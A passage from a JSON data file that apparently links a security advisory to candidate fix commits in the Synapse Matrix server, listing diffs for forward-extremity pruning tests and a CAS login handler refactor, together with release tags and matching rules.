new_senders,", - "+ )", - "+", - "+ return new_latest_event_ids", - "+", - "+ times_pruned_extremities.inc()", - "+", - "+ logger.info(", - "+ \"Pruning forward extremities in room %s: from %s -> %s\",", - "+ room_id,", - "+ new_latest_event_ids,", - "+ new_new_extrems,", - "+ )", - "+ return new_new_extrems", - "diff --git a/synapse/visibility.py b/synapse/visibility.py", - "index f2836ba9f..ec50e7e97 100644", - "--- a/synapse/visibility.py", - "+++ b/synapse/visibility.py", - "@@ -127,3 +127,3 @@ async def filter_events_for_client(", - " if filter_send_to_client:", - "- if event.type == \"org.matrix.dummy_event\":", - "+ if event.type == EventTypes.Dummy:", - " return None", - "diff --git a/tests/storage/test_events.py b/tests/storage/test_events.py", - "new file mode 100644", - "index 000000000..71210ce60", - "--- /dev/null", - "+++ b/tests/storage/test_events.py", - "@@ -0,0 +1,334 @@", - "+# -*- coding: utf-8 -*-", - "+# Copyright 2020 The Matrix.org Foundation C.I.C.", - "+#", - "+# Licensed under the Apache License, Version 2.0 (the \"License\");", - "+# you may not use this file except in compliance with the License.", - "+# You may obtain a copy of the License at", - "+#", - "+# http://www.apache.org/licenses/LICENSE-2.0", - "+#", - "+# Unless required by applicable law or agreed to in writing, software", - "+# distributed under the License is distributed on an \"AS IS\" BASIS,", - "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+# See the License for the specific language governing permissions and", - "+# limitations under the License.", - "+", - "+", - "+from synapse.api.constants import EventTypes, Membership", - "+from synapse.api.room_versions import RoomVersions", - "+from synapse.federation.federation_base import event_from_pdu_json", - "+from synapse.rest import admin", - "+from synapse.rest.client.v1 import login, room", - "+", - "+from tests.unittest import HomeserverTestCase", - "+", - "+", - "+class ExtremPruneTestCase(HomeserverTestCase):", - "+ servlets = [", - "+ admin.register_servlets,", - "+ room.register_servlets,", - "+ login.register_servlets,", - "+ ]", - "+", - "+ def prepare(self, reactor, clock, homeserver):", - "+ self.state = self.hs.get_state_handler()", - "+ self.persistence = self.hs.get_storage().persistence", - "+ self.store = self.hs.get_datastore()", - "+", - "+ self.register_user(\"user\", \"pass\")", - "+ self.token = self.login(\"user\", \"pass\")", - "+", - "+ self.room_id = self.helper.create_room_as(", - "+ \"user\", room_version=RoomVersions.V6.identifier, tok=self.token", - "+ )", - "+", - "+ body = self.helper.send(self.room_id, body=\"Test\", tok=self.token)", - "+ local_message_event_id = body[\"event_id\"]", - "+", - "+ # Fudge a remote event and persist it. This will be the extremity before", - "+ # the gap.", - "+ self.remote_event_1 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Message,", - "+ \"state_key\": \"@user:other\",", - "+ \"content\": {},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other\",", - "+ \"depth\": 5,", - "+ \"prev_events\": [local_message_event_id],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ self.persist_event(self.remote_event_1)", - "+", - "+ # Check that the current extremities is the remote event.", - "+ self.assert_extremities([self.remote_event_1.event_id])", - "+", - "+ def persist_event(self, event, state=None):", - "+ \"\"\"Persist the event, with optional state", - "+ \"\"\"", - "+ context = self.get_success(", - "+ self.state.compute_event_context(event, old_state=state)", - "+ )", - "+ self.get_success(self.persistence.persist_event(event, context))", - "+", - "+ def assert_extremities(self, expected_extremities):", - "+ \"\"\"Assert the current extremities for the room", - "+ \"\"\"", - "+ extremities = self.get_success(", - "+ self.store.get_prev_events_for_room(self.room_id)", - "+ )", - "+ self.assertCountEqual(extremities, expected_extremities)", - "+", - "+ def test_prune_gap(self):", - "+ \"\"\"Test that we drop extremities after a gap when we see an event from", - "+ the same domain.", - "+ \"\"\"", - "+", - "+ # Fudge a second event which points to an event we don't have. This is a", - "+ # state event so that the state changes (otherwise we won't prune the", - "+ # extremity as they'll have the same state group).", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Member,", - "+ \"state_key\": \"@user:other\",", - "+ \"content\": {\"membership\": Membership.JOIN},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other\",", - "+ \"depth\": 50,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", - "+", - "+ self.persist_event(remote_event_2, state=state_before_gap.values())", - "+", - "+ # Check the new extremity is just the new remote event.", - "+ self.assert_extremities([remote_event_2.event_id])", - "+", - "+ def test_do_not_prune_gap_if_state_different(self):", - "+ \"\"\"Test that we don't prune extremities after a gap if the resolved", - "+ state is different.", - "+ \"\"\"", - "+", - "+ # Fudge a second event which points to an event we don't have.", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Message,", - "+ \"state_key\": \"@user:other\",", - "+ \"content\": {},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other\",", - "+ \"depth\": 10,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ # Now we persist it with state with a dropped history visibility", - "+ # setting. The state resolution across the old and new event will then", - "+ # include it, and so the resolved state won't match the new state.", - "+ state_before_gap = dict(", - "+ self.get_success(self.state.get_current_state(self.room_id))", - "+ )", - "+ state_before_gap.pop((\"m.room.history_visibility\", \"\"))", - "+", - "+ context = self.get_success(", - "+ self.state.compute_event_context(", - "+ remote_event_2, old_state=state_before_gap.values()", - "+ )", - "+ )", - "+", - "+ self.get_success(self.persistence.persist_event(remote_event_2, context))", - "+", - "+ # Check that we haven't dropped the old extremity.", - "+ self.assert_extremities([self.remote_event_1.event_id, remote_event_2.event_id])", - "+", - "+ def test_prune_gap_if_old(self):", - "+ \"\"\"Test that we drop extremities after a gap when the previous extremity", - "+ is \"old\"", - "+ \"\"\"", - "+", - "+ # Advance the clock for many days to make the old extremity \"old\". We", - "+ # also set the depth to \"lots\".", - "+ self.reactor.advance(7 * 24 * 60 * 60)", - "+", - "+ # Fudge a second event which points to an event we don't have. This is a", - "+ # state event so that the state changes (otherwise we won't prune the", - "+ # extremity as they'll have the same state group).", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Member,", - "+ \"state_key\": \"@user:other2\",", - "+ \"content\": {\"membership\": Membership.JOIN},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other2\",", - "+ \"depth\": 10000,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", - "+", - "+ self.persist_event(remote_event_2, state=state_before_gap.values())", - "+", - "+ # Check the new extremity is just the new remote event.", - "+ self.assert_extremities([remote_event_2.event_id])", - "+", - "+ def test_do_not_prune_gap_if_other_server(self):", - "+ \"\"\"Test that we do not drop extremities after a gap when we see an event", - "+ from a different domain.", - "+ \"\"\"", - "+", - "+ # Fudge a second event which points to an event we don't have. This is a", - "+ # state event so that the state changes (otherwise we won't prune the", - "+ # extremity as they'll have the same state group).", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Member,", - "+ \"state_key\": \"@user:other2\",", - "+ \"content\": {\"membership\": Membership.JOIN},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other2\",", - "+ \"depth\": 10,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", - "+", - "+ self.persist_event(remote_event_2, state=state_before_gap.values())", - "+", - "+ # Check the new extremity is just the new remote event.", - "+ self.assert_extremities([self.remote_event_1.event_id, remote_event_2.event_id])", - "+", - "+ def test_prune_gap_if_dummy_remote(self):", - "+ \"\"\"Test that we drop extremities after a gap when the previous extremity", - "+ is a local dummy event and only points to remote events.", - "+ \"\"\"", - "+", - "+ body = self.helper.send_event(", - "+ self.room_id, type=EventTypes.Dummy, content={}, tok=self.token", - "+ )", - "+ local_message_event_id = body[\"event_id\"]", - "+ self.assert_extremities([local_message_event_id])", - "+", - "+ # Advance the clock for many days to make the old extremity \"old\". We", - "+ # also set the depth to \"lots\".", - "+ self.reactor.advance(7 * 24 * 60 * 60)", - "+", - "+ # Fudge a second event which points to an event we don't have. This is a", - "+ # state event so that the state changes (otherwise we won't prune the", - "+ # extremity as they'll have the same state group).", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Member,", - "+ \"state_key\": \"@user:other2\",", - "+ \"content\": {\"membership\": Membership.JOIN},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other2\",", - "+ \"depth\": 10000,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", - "+", - "+ self.persist_event(remote_event_2, state=state_before_gap.values())", - "+", - "+ # Check the new extremity is just the new remote event.", - "+ self.assert_extremities([remote_event_2.event_id])", - "+", - "+ def test_prune_gap_if_dummy_local(self):", - "+ \"\"\"Test that we don't drop extremities after a gap when the previous", - "+ extremity is a local dummy event and points to local events.", - "+ \"\"\"", - "+", - "+ body = self.helper.send(self.room_id, body=\"Test\", tok=self.token)", - "+", - "+ body = self.helper.send_event(", - "+ self.room_id, type=EventTypes.Dummy, content={}, tok=self.token", - "+ )", - "+ local_message_event_id = body[\"event_id\"]", - "+ self.assert_extremities([local_message_event_id])", - "+", - "+ # Advance the clock for many days to make the old extremity \"old\". We", - "+ # also set the depth to \"lots\".", - "+ self.reactor.advance(7 * 24 * 60 * 60)", - "+", - "+ # Fudge a second event which points to an event we don't have. This is a", - "+ # state event so that the state changes (otherwise we won't prune the", - "+ # extremity as they'll have the same state group).", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Member,", - "+ \"state_key\": \"@user:other2\",", - "+ \"content\": {\"membership\": Membership.JOIN},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other2\",", - "+ \"depth\": 10000,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", - "+", - "+ self.persist_event(remote_event_2, state=state_before_gap.values())", - "+", - "+ # Check the new extremity is just the new remote event.", - "+ self.assert_extremities([remote_event_2.event_id, local_message_event_id])", - "+", - "+ def test_do_not_prune_gap_if_not_dummy(self):", - "+ \"\"\"Test that we do not drop extremities after a gap when the previous extremity", - "+ is not a dummy event.", - "+ \"\"\"", - "+", - "+ body = self.helper.send(self.room_id, body=\"test\", tok=self.token)", - "+ local_message_event_id = body[\"event_id\"]", - "+ self.assert_extremities([local_message_event_id])", - "+", - "+ # Fudge a second event which points to an event we don't have. This is a", - "+ # state event so that the state changes (otherwise we won't prune the", - "+ # extremity as they'll have the same state group).", - "+ remote_event_2 = event_from_pdu_json(", - "+ {", - "+ \"type\": EventTypes.Member,", - "+ \"state_key\": \"@user:other2\",", - "+ \"content\": {\"membership\": Membership.JOIN},", - "+ \"room_id\": self.room_id,", - "+ \"sender\": \"@user:other2\",", - "+ \"depth\": 10000,", - "+ \"prev_events\": [\"$some_unknown_message\"],", - "+ \"auth_events\": [],", - "+ \"origin_server_ts\": self.clock.time_msec(),", - "+ },", - "+ RoomVersions.V6,", - "+ )", - "+", - "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", - "+", - "+ self.persist_event(remote_event_2, state=state_before_gap.values())", - "+", - "+ # Check the new extremity is just the new remote event.", - "+ self.assert_extremities([local_message_event_id, remote_event_2.event_id])" - ], - "changed_files": [ - "changelog.d/8929.misc", - "synapse/api/constants.py", - "synapse/handlers/message.py", - "synapse/storage/persist_events.py", - "synapse/visibility.py", - "tests/storage/test_events.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8929": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8929, 8929", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8929", - "relevance": 2 - } - ] - }, - { - "commit_id": "4218473f9ea6a2680c21e96368dfe9c06271c8a4", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608314985, - "hunks": 24, - "message": "Refactor the CAS handler in prep for using the abstracted SSO code. (#8958) This makes the CAS handler look more like the SAML/OIDC handlers: * Render errors to users instead of throwing JSON errors. * Internal reorganization.", - "diff": [ - "diff --git a/changelog.d/8958.misc b/changelog.d/8958.misc", - "new file mode 100644", - "index 000000000..1507073e4", - "--- /dev/null", - "+++ b/changelog.d/8958.misc", - "@@ -0,0 +1 @@", - "+Properly store the mapping of external ID to Matrix ID for CAS users.", - "diff --git a/synapse/handlers/cas_handler.py b/synapse/handlers/cas_handler.py", - "index f4ea0a976..e9891e131 100644", - "--- a/synapse/handlers/cas_handler.py", - "+++ b/synapse/handlers/cas_handler.py", - "@@ -15,9 +15,11 @@", - " import logging", - "-import urllib", - "-from typing import TYPE_CHECKING, Dict, Optional, Tuple", - "+import urllib.parse", - "+from typing import TYPE_CHECKING, Dict, Optional", - " from xml.etree import ElementTree as ET", - "+import attr", - "+", - " from twisted.web.client import PartialDownloadError", - "-from synapse.api.errors import Codes, LoginError", - "+from synapse.api.errors import HttpResponseException", - " from synapse.http.site import SynapseRequest", - "@@ -31,2 +33,22 @@ logger = logging.getLogger(__name__)", - "+class CasError(Exception):", - "+ \"\"\"Used to catch errors when validating the CAS ticket.", - "+ \"\"\"", - "+", - "+ def __init__(self, error, error_description=None):", - "+ self.error = error", - "+ self.error_description = error_description", - "+", - "+ def __str__(self):", - "+ if self.error_description:", - "+ return \"{}: {}\".format(self.error, self.error_description)", - "+ return self.error", - "+", - "+", - "+@attr.s(slots=True, frozen=True)", - "+class CasResponse:", - "+ username = attr.ib(type=str)", - "+ attributes = attr.ib(type=Dict[str, Optional[str]])", - "+", - "+", - " class CasHandler:", - "@@ -52,2 +74,4 @@ class CasHandler:", - "+ self._sso_handler = hs.get_sso_handler()", - "+", - " def _build_service_param(self, args: Dict[str, str]) -> str:", - "@@ -71,5 +95,5 @@ class CasHandler:", - " self, ticket: str, service_args: Dict[str, str]", - "- ) -> Tuple[str, Optional[str]]:", - "+ ) -> CasResponse:", - " \"\"\"", - "- Validate a CAS ticket with the server, parse the response, and return the user and display name.", - "+ Validate a CAS ticket with the server, and return the parsed the response.", - "@@ -79,2 +103,8 @@ class CasHandler:", - " Should be the same as those passed to `get_redirect_url`.", - "+", - "+ Raises:", - "+ CasError: If there's an error parsing the CAS response.", - "+", - "+ Returns:", - "+ The parsed CAS response.", - " \"\"\"", - "@@ -91,23 +121,14 @@ class CasHandler:", - " body = pde.response", - "+ except HttpResponseException as e:", - "+ description = (", - "+ (", - "+ 'Authorization server responded with a \"{status}\" error '", - "+ \"while exchanging the authorization code.\"", - "+ ).format(status=e.code),", - "+ )", - "+ raise CasError(\"server_error\", description) from e", - "- user, attributes = self._parse_cas_response(body)", - "- displayname = attributes.pop(self._cas_displayname_attribute, None)", - "-", - "- for required_attribute, required_value in self._cas_required_attributes.items():", - "- # If required attribute was not in CAS Response - Forbidden", - "- if required_attribute not in attributes:", - "- raise LoginError(401, \"Unauthorized\", errcode=Codes.UNAUTHORIZED)", - "-", - "- # Also need to check value", - "- if required_value is not None:", - "- actual_value = attributes[required_attribute]", - "- # If required attribute value does not match expected - Forbidden", - "- if required_value != actual_value:", - "- raise LoginError(401, \"Unauthorized\", errcode=Codes.UNAUTHORIZED)", - "-", - "- return user, displayname", - "+ return self._parse_cas_response(body)", - "- def _parse_cas_response(", - "- self, cas_response_body: bytes", - "- ) -> Tuple[str, Dict[str, Optional[str]]]:", - "+ def _parse_cas_response(self, cas_response_body: bytes) -> CasResponse:", - " \"\"\"", - "@@ -118,35 +139,43 @@ class CasHandler:", - "+ Raises:", - "+ CasError: If there's an error parsing the CAS response.", - "+", - " Returns:", - "- A tuple of the user and a mapping of other attributes.", - "+ The parsed CAS response.", - " \"\"\"", - "+", - "+ # Ensure the response is valid.", - "+ root = ET.fromstring(cas_response_body)", - "+ if not root.tag.endswith(\"serviceResponse\"):", - "+ raise CasError(", - "+ \"missing_service_response\",", - "+ \"root of CAS response is not serviceResponse\",", - "+ )", - "+", - "+ success = root[0].tag.endswith(\"authenticationSuccess\")", - "+ if not success:", - "+ raise CasError(\"unsucessful_response\", \"Unsuccessful CAS response\")", - "+", - "+ # Iterate through the nodes and pull out the user and any extra attributes.", - " user = None", - " attributes = {}", - "- try:", - "- root = ET.fromstring(cas_response_body)", - "- if not root.tag.endswith(\"serviceResponse\"):", - "- raise Exception(\"root of CAS response is not serviceResponse\")", - "- success = root[0].tag.endswith(\"authenticationSuccess\")", - "- for child in root[0]:", - "- if child.tag.endswith(\"user\"):", - "- user = child.text", - "- if child.tag.endswith(\"attributes\"):", - "- for attribute in child:", - "- # ElementTree library expands the namespace in", - "- # attribute tags to the full URL of the namespace.", - "- # We don't care about namespace here and it will always", - "- # be encased in curly braces, so we remove them.", - "- tag = attribute.tag", - "- if \"}\" in tag:", - "- tag = tag.split(\"}\")[1]", - "- attributes[tag] = attribute.text", - "- if user is None:", - "- raise Exception(\"CAS response does not contain user\")", - "- except Exception:", - "- logger.exception(\"Error parsing CAS response\")", - "- raise LoginError(401, \"Invalid CAS response\", errcode=Codes.UNAUTHORIZED)", - "- if not success:", - "- raise LoginError(", - "- 401, \"Unsuccessful CAS response\", errcode=Codes.UNAUTHORIZED", - "- )", - "- return user, attributes", - "+ for child in root[0]:", - "+ if child.tag.endswith(\"user\"):", - "+ user = child.text", - "+ if child.tag.endswith(\"attributes\"):", - "+ for attribute in child:", - "+ # ElementTree library expands the namespace in", - "+ # attribute tags to the full URL of the namespace.", - "+ # We don't care about namespace here and it will always", - "+ # be encased in curly braces, so we remove them.", - "+ tag = attribute.tag", - "+ if \"}\" in tag:", - "+ tag = tag.split(\"}\")[1]", - "+ attributes[tag] = attribute.text", - "+", - "+ # Ensure a user was found.", - "+ if user is None:", - "+ raise CasError(\"no_user\", \"CAS response does not contain user\")", - "+", - "+ return CasResponse(user, attributes)", - "@@ -203,3 +232,64 @@ class CasHandler:", - " args[\"session\"] = session", - "- username, user_display_name = await self._validate_ticket(ticket, args)", - "+", - "+ try:", - "+ cas_response = await self._validate_ticket(ticket, args)", - "+ except CasError as e:", - "+ logger.exception(\"Could not validate ticket\")", - "+ self._sso_handler.render_error(request, e.error, e.error_description, 401)", - "+ return", - "+", - "+ await self._handle_cas_response(", - "+ request, cas_response, client_redirect_url, session", - "+ )", - "+", - "+ async def _handle_cas_response(", - "+ self,", - "+ request: SynapseRequest,", - "+ cas_response: CasResponse,", - "+ client_redirect_url: Optional[str],", - "+ session: Optional[str],", - "+ ) -> None:", - "+ \"\"\"Handle a CAS response to a ticket request.", - "+", - "+ Assumes that the response has been validated. Maps the user onto an MXID,", - "+ registering them if necessary, and returns a response to the browser.", - "+", - "+ Args:", - "+ request: the incoming request from the browser. We'll respond to it with an", - "+ HTML page or a redirect", - "+", - "+ cas_response: The parsed CAS response.", - "+", - "+ client_redirect_url: the redirectUrl parameter from the `/cas/ticket` HTTP request, if given.", - "+ This should be the same as the redirectUrl from the original `/login/sso/redirect` request.", - "+", - "+ session: The session parameter from the `/cas/ticket` HTTP request, if given.", - "+ This should be the UI Auth session id.", - "+ \"\"\"", - "+", - "+ # Ensure that the attributes of the logged in user meet the required", - "+ # attributes.", - "+ for required_attribute, required_value in self._cas_required_attributes.items():", - "+ # If required attribute was not in CAS Response - Forbidden", - "+ if required_attribute not in cas_response.attributes:", - "+ self._sso_handler.render_error(", - "+ request,", - "+ \"unauthorised\",", - "+ \"You are not authorised to log in here.\",", - "+ 401,", - "+ )", - "+ return", - "+", - "+ # Also need to check value", - "+ if required_value is not None:", - "+ actual_value = cas_response.attributes[required_attribute]", - "+ # If required attribute value does not match expected - Forbidden", - "+ if required_value != actual_value:", - "+ self._sso_handler.render_error(", - "+ request,", - "+ \"unauthorised\",", - "+ \"You are not authorised to log in here.\",", - "+ 401,", - "+ )", - "+ return", - "@@ -211,3 +301,3 @@ class CasHandler:", - " user_id = await self._map_cas_user_to_matrix_user(", - "- username, user_display_name, user_agent, ip_address", - "+ cas_response, user_agent, ip_address", - " )", - "@@ -227,7 +317,3 @@ class CasHandler:", - " async def _map_cas_user_to_matrix_user(", - "- self,", - "- remote_user_id: str,", - "- display_name: Optional[str],", - "- user_agent: str,", - "- ip_address: str,", - "+ self, cas_response: CasResponse, user_agent: str, ip_address: str,", - " ) -> str:", - "@@ -237,4 +323,3 @@ class CasHandler:", - " Args:", - "- remote_user_id: The username from the CAS response.", - "- display_name: The display name from the CAS response.", - "+ cas_response: The parsed CAS response.", - " user_agent: The user agent of the client making the request.", - "@@ -246,3 +331,3 @@ class CasHandler:", - "- localpart = map_username_to_mxid_localpart(remote_user_id)", - "+ localpart = map_username_to_mxid_localpart(cas_response.username)", - " user_id = UserID(localpart, self._hostname).to_string()", - "@@ -250,2 +335,4 @@ class CasHandler:", - "+ displayname = cas_response.attributes.get(self._cas_displayname_attribute, None)", - "+", - " # If the user does not exist, register it.", - "@@ -254,3 +341,3 @@ class CasHandler:", - " localpart=localpart,", - "- default_display_name=display_name,", - "+ default_display_name=displayname,", - " user_agent_ips=[(user_agent, ip_address)],", - "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", - "index 548b02211..b0a8c8c7d 100644", - "--- a/synapse/handlers/sso.py", - "+++ b/synapse/handlers/sso.py", - "@@ -103,3 +103,7 @@ class SsoHandler:", - " def render_error(", - "- self, request, error: str, error_description: Optional[str] = None", - "+ self,", - "+ request: Request,", - "+ error: str,", - "+ error_description: Optional[str] = None,", - "+ code: int = 400,", - " ) -> None:", - "@@ -115,2 +119,3 @@ class SsoHandler:", - " error_description: A human-readable description of the error.", - "+ code: The integer error code (an HTTP response code)", - " \"\"\"", - "@@ -119,3 +124,3 @@ class SsoHandler:", - " )", - "- respond_with_html(request, 400, html)", - "+ respond_with_html(request, code, html)" - ], - "changed_files": [ - "changelog.d/8958.misc", - "synapse/handlers/cas_handler.py", - "synapse/handlers/sso.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8958": "Use the abstract registration code for CAS #8856" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - 